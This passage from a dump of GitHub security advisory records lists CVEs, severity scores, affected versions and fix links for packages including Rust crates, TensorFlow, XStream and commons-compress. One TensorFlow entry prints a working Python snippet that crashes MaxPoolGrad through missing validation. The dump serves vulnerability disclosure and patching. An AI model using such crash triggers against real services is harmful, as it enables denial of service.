'PACKAGE', 'url': 'https://github.com/krl/bunch'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/bunch/RUSTSEC-2020-0130.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0130.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:34:27Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-wc43-7wj6-4ggr,2021-05-04T22:07:25Z,2021-08-02T17:29:09Z,,['CVE-2020-1180'],Remote code execution in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1172.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1180'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/ChakraCore/pull/6500'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1180'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:07:25Z', 'nvd_published_at': '2020-09-11T17:15:00Z'}" +1.4.0,GHSA-4q2r-qxp6-h5j6,2021-08-26T16:34:46Z,2021-08-30T16:25:18Z,,['CVE-2020-18705'],Improper Restriction of XML External Entity Reference in Quokka,XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/core/content/views.py'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'quokka'}, 'ecosystem_specific': {'affected_functions': ['quokka.admin.wtforms_html5.set_title']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-18705'}, {'type': 'WEB', 'url': 'https://github.com/rochacbruno/quokka/issues/676'}, {'type': 'WEB', 'url': 'https://github.com/quokkaproject/quokka/pull/679'}, {'type': 'PACKAGE', 'url': 'https://github.com/rochacbruno/quokka'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T16:34:46Z', 'nvd_published_at': '2021-08-16T18:15:00Z'}" +1.4.0,GHSA-9j8q-m9x5-9g6j,2021-08-24T18:52:16Z,2021-08-25T20:59:11Z,,['CVE-2020-36444'],Data races in async-coap,"An issue was discovered in the async-coap crate through 2020-12-08 for Rust. +Affected versions of this crate implement Send/Sync for `ArcGuard` with no trait bounds on `RC`. This allows users to send `RC: !Send` to other threads and also allows users to concurrently access `Rc: !Sync` from multiple threads. + +This can result in memory corruption from data race or other undefined behavior caused by sending `T: !Send` to other threads (e.g. dropping `MutexGuard` in another thread that didn't lock its mutex). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'async-coap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36444'}, {'type': 'WEB', 'url': 'https://github.com/google/rust-async-coap/issues/33'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/rust-async-coap'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/async-coap/RUSTSEC-2020-0124.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0124.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:45:44Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-g4vj-x7v9-h82m,2021-08-18T21:20:32Z,2021-08-25T20:56:03Z,,['CVE-2021-38195'],Overflow in libsecp256k1,"An issue was discovered in the libsecp256k1 crate before 0.5.0 for Rust. It can verify an invalid signature because it allows the R or S parameter to be larger than the curve order, aka an overflow.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libsecp256k1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38195'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/libsecp256k1/pull/67'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/libsecp256k1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0076.html'}]","{'cwe_ids': ['CWE-190', 'CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:20:32Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-x4qm-mcjq-v2gf,2023-06-13T20:26:47Z,2021-08-25T20:55:53Z,,['CVE-2021-38192'],Overflow in prost-types,Affected versions of this crate contained a bug in which untrusted input could cause an overflow and panic when converting a Timestamp to SystemTime. It is recommended to upgrade to prost-types v0.8 and switch the usage of From for SystemTime to TryFrom for SystemTime.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'prost-types'}, 'ecosystem_specific': {'affected_functions': ['prost_types::Timestamp::Into']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38192'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/prost/issues/438'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/prost/pull/439'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/prost/commit/59f2a7311dd6540696bfd0145f5281ce495f4385'}, {'type': 'PACKAGE', 'url': 'https://github.com/tokio-rs/prost/tree/master/prost-types'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0073.html'}]","{'cwe_ids': ['CWE-120', 'CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:29:54Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-9q94-v7ch-mxqw,2021-05-25T20:12:12Z,2021-08-02T17:35:42Z,,['CVE-2020-8867'],Insufficient Session Expiration and TOCTOU Race Condition in OPC FOundation UA .Net Standard,This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of OPC Foundation UA .NET Standard 1.04.358.30. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of sessions. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to create a denial-of-service condition against the application. Was ZDI-CAN-10295.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.359.31'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.358.30'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8867'}, {'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/releases/tag/1.4.359.31'}, {'type': 'WEB', 'url': 'https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2020-8867.pdf'}, {'type': 'WEB', 'url': 'https://www.zerodayinitiative.com/advisories/ZDI-20-536/'}]","{'cwe_ids': ['CWE-367', 'CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:12:12Z', 'nvd_published_at': '2020-04-22T21:15:00Z'}" +1.4.0,GHSA-6c73-2v8x-qpvm,2021-08-23T17:02:24Z,2021-08-23T19:41:30Z,,[],Argo Server TLS requests could be forged by attacker with network access,"### Impact + +We are not aware of any exploits. This is a pro-active fix. + +Impacted: + +* You are running Argo Server < v3.0 with `--secure=true` or >= v3.0 with `--secure` unspecified (note - running in secure mode is recommended regardless). +* The attacker is within your network. If you expose Argo Server to the Internet then ""your network"" is ""the Internet"". + +The Argo Server's keys are packaged within the image. They could be extracted and used to decrypt traffic, or forge requests. + +### Patches + +https://github.com/argoproj/argo-workflows/pull/6540 + +### Workarounds + +* Make sure that your Argo Server service or pod are not directly accessible outside of your cluster. Put TLS load balancer in front of it. + +This was identified by engineers at Jetstack.io",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/security/advisories/GHSA-6c73-2v8x-qpvm'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:02:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-7ghq-fvr3-pj2x,2021-08-24T15:39:22Z,2021-08-25T14:41:33Z,,['CVE-2021-37674'],Incomplete validation in `MaxPoolGrad`,"### Impact +An attacker can trigger a denial of service via a segmentation fault in `tf.raw_ops.MaxPoolGrad` caused by missing validation: + +```python +import tensorflow as tf + +tf.raw_ops.MaxPoolGrad( + orig_input = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), + orig_output = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), + grad = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), + ksize = [1, 16, 16, 1], + strides = [1, 16, 18, 1], + padding = ""EXPLICIT"", + explicit_paddings = [0, 0, 14, 3, 15, 5, 0, 0]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/maxpooling_op.cc) misses some validation for the `orig_input` and `orig_output` tensors. + +The fixes for [CVE-2021-29579](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md) were incomplete. + +### Patches +We have patched the issue in GitHub commit [136b51f10903e044308cf77117c0ed9871350475](https://github.com/tensorflow/tensorflow/commit/136b51f10903e044308cf77117c0ed9871350475). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7ghq-fvr3-pj2x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37674'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/136b51f10903e044308cf77117c0ed9871350475'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md'}]","{'cwe_ids': ['CWE-1284', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:39:22Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-cxfm-5m4g-x7xp,2022-02-08T20:43:26Z,2021-08-25T14:47:19Z,,['CVE-2021-39150'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact +The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39150](https://x-stream.github.io/CVE-2021-39150.html). + +### Credits +Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-cxfm-5m4g-x7xp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39150'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39150.html'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:24Z', 'nvd_published_at': '2021-08-23T19:15:00Z'}" +1.4.0,GHSA-xqfj-vm6h-2x34,2022-02-08T21:02:55Z,2021-08-02T16:55:39Z,,['CVE-2021-35517'],Improper Handling of Length Parameter Inconsistency in Compress,"When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35517'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31f75743ac173b0a606f8ea6ea53f351f386c44e7bcf78ae04007c29@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r457b2ed564860996b20d938566fe8bd4bfb7c37be8e205448ccb5975@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54afdab05e01de970649c2d91a993f68a6b00cd73e6e34e16c832d46@%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r605d906b710b95f1bbe0036a53ac6968f667f2c249b6fbabada9a940%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra393ffdc7c90a4a37ea023946f390285693795013a642d80fba20203@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/5'}]","{'cwe_ids': ['CWE-130', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T18:12:57Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}" +1.4.0,GHSA-xjxc-vfw2-cg96,2023-06-13T19:56:24Z,2021-08-25T20:43:45Z,,['CVE-2018-20997'],Use after free in openssl,An issue was discovered in the openssl crate before 0.10.9 for Rust. A use-after-free occurs in CMS Signing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.8'}, {'fixed': '0.10.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20997'}, {'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/942'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0010.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:24Z', 'nvd_published_at': '2019-08-26T18:15:00Z'}" +1.4.0,GHSA-37jj-wp7g-7wj4,2021-08-19T17:53:09Z,2021-08-25T20:53:12Z,,['CVE-2021-26305'],Read of uninitialized memory in cdr,"An issue was discovered in Deserializer::read_vec in the cdr crate before 0.2.4 for Rust. A user-provided Read implementation can gain access to the old contents of newly allocated heap memory, violating soundness.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cdr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26305'}, {'type': 'WEB', 'url': 'https://github.com/hrektts/cdr-rs/issues/10'}, {'type': 'WEB', 'url': 'https://github.com/hrektts/cdr-rs/pull/11'}, {'type': 'WEB', 'url': 'https://github.com/hrektts/cdr-rs/commit/0e6006de464caa331643f86cd2d9ba3b32b09833'}, {'type': 'PACKAGE', 'url': 'https://github.com/hrektts/cdr-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0012.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:53:09Z', 'nvd_published_at': None}" +1.4.0,GHSA-7mg7-m5c3-3hqj,2021-08-24T17:47:15Z,2021-08-25T21:00:39Z,2021-08-24T17:47:15Z,[],Data races in unicycle,"Affected versions of this crate unconditionally implemented `Send` & `Sync` for types `PinSlab` & `Unordered`. This allows sending non-Send types to other threads and concurrently accessing non-Sync types from multiple threads. + +This can result in a data race & memory corruption when types that provide internal mutability without synchronization are contained within `PinSlab` or `Unordered` and accessed concurrently from multiple threads. + +The flaw was corrected in commits 92f40b4 & 6a6c367 by adding trait bound `T: Send` to `Send` impls for `PinSlab` & `Unordered` and adding `T: Sync` to `Sync` impls for `PinSlab` & `Unordered`. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'unicycle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/commit/6a6c367a0c25f86f998fa315ea90c328f685b194'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/commit/92f40b4a2c671553dfa96feacff0265206c44ce5'}, {'type': 'PACKAGE', 'url': 'https://github.com/udoprog/unicycle'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0116.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T21:14:52Z', 'nvd_published_at': None}" +1.4.0,GHSA-jj8r-p9f5-fmvv,2021-08-30T17:07:59Z,2021-08-30T17:22:25Z,,['CVE-2021-36785'],Cross-site Scripting in TYPO3 extension,The miniorange_saml (aka Miniorange Saml) extension before 1.4.3 for TYPO3 allows XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'miniorange/miniorange-saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36785'}, {'type': 'WEB', 'url': 'https://github.com/miniOrangeDev/miniorange-saml-typo3-sso/commit/1fe2802267ffe1b48823d9d8b3a496c870a0af48'}, {'type': 'PACKAGE', 'url': 'https://github.com/miniOrangeDev/miniorange-saml-typo3-sso'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories/security'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-011'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:07:59Z', 'nvd_published_at': '2021-08-13T17:15:00Z'}" +1.4.0,GHSA-c8hq-x4mm-p6q6,2023-02-13T16:58:12Z,2021-08-25T20:50:54Z,,['CVE-2020-36205'],Memory handling issues in xcb,"An issue was discovered in the xcb crate through 2020-12-10 for Rust. base::Error does not have soundness. Because of the public ptr field, a use-after-free or double-free can occur.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36205'}, {'type': 'WEB', 'url': 'https://github.com/rtbo/rust-xcb/issues/93'}, {'type': 'WEB', 'url': 'https://github.com/rust-x-bindings/rust-xcb/issues/93'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0097.html'}]","{'cwe_ids': ['CWE-415', 'CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:50:43Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-3cj3-jrrp-9rxf,2021-08-19T17:44:11Z,2021-08-25T20:53:18Z,,['CVE-2021-26958'],Unchecked Return Value in xcb,An issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because transmutation to the wrong type can happen after xcb::base::cast_event uses std::mem::transmute to return a reference to an arbitrary type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ecosystem_specific': {'affected_functions': ['xcb::base::cast_event']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26958'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html'}]","{'cwe_ids': ['CWE-252'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:44:11Z', 'nvd_published_at': None}" +1.4.0,GHSA-6239-28c2-9mrm,2022-08-04T11:22:29Z,2021-08-30T17:22:38Z,,['CVE-2021-38554'],Improper Removal of 